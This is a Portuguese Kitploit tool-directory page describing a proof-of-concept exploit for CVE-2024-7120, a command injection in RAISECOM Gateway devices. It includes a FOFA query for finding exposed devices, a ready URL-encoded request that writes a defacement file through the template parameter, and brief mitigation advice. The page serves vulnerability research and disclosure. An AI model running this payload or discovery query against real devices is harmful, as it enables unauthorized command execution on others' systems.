Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-7120-Exploit-by-Dark-07x — Prova de conceito de exploit para injeção de comandos CVE-2024-7120 em dispositivos RAISECOM Gateway. Executa comandos arbitrários através do parâmetro template em list_base_config.php. | Kitploit
Ferramentas/GitHubGitHub/jokeir07x/cve-2024-7120-exploit-by-dark-07x
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubjokeir07x/cve-2024-7120-exploit-by-dark-07x

CVE-2024-7120-Exploit-by-Dark-07x

Prova de conceito de exploit para injeção de comandos CVE-2024-7120 em dispositivos RAISECOM Gateway. Executa comandos arbitrários através do parâmetro template em list_base_config.php.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 1 anoAinda não revisado

Prova de Conceito de Injeção de Comando em Dispositivos Raisecom (CVE-2024-7120)!

Visão Geral

Uma vulnerabilidade de injeção de comando foi identificada nos dispositivos RAISECOM Gateway, afetando os modelos MSG1200, MSG2100E, MSG2200 e MSG2300. Esta vulnerabilidade permite que atacantes remotos executem comandos arbitrários no sistema através da interface web. O problema reside no script list_base_config.php, especificamente através do parâmetro template, afetando mais de 25.112 dispositivos na Internet.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

Componentes Afetados

URI: /vpn/list_base_config.php

Descrição: o list_base_config.php é um componente de interface web dos dispositivos RAISECOM Gateway usado para gerenciar configurações de VPN. A vulnerabilidade identificada surge devido ao tratamento inadequado do parâmetro template neste script. Este parâmetro pode ser explorado para executar comandos arbitrários no sistema operacional do dispositivo devido à sanitização insuficiente da entrada.

CWE

CWE-77: Command Injection

Exploração

Aqui está um exemplo de como a vulnerabilidade pode ser explorada usando um comando curl:

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Hacked By Dark 07x}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

Neste exemplo, o comando curl envia uma solicitação HTTP GET maliciosa para o script list_base_config.php. A solicitação utiliza o parâmetro template para executar um comando.

  1. Validação de Entrada: Implemente verificações de validação rigorosas em todas as entradas do usuário, especialmente aquelas que podem afetar comandos do sistema ou caminhos de arquivos.
  2. Controles de Acesso: Restrinja o acesso à interface web do dispositivo a redes confiáveis e usuários autenticados.
Baixar ferramenta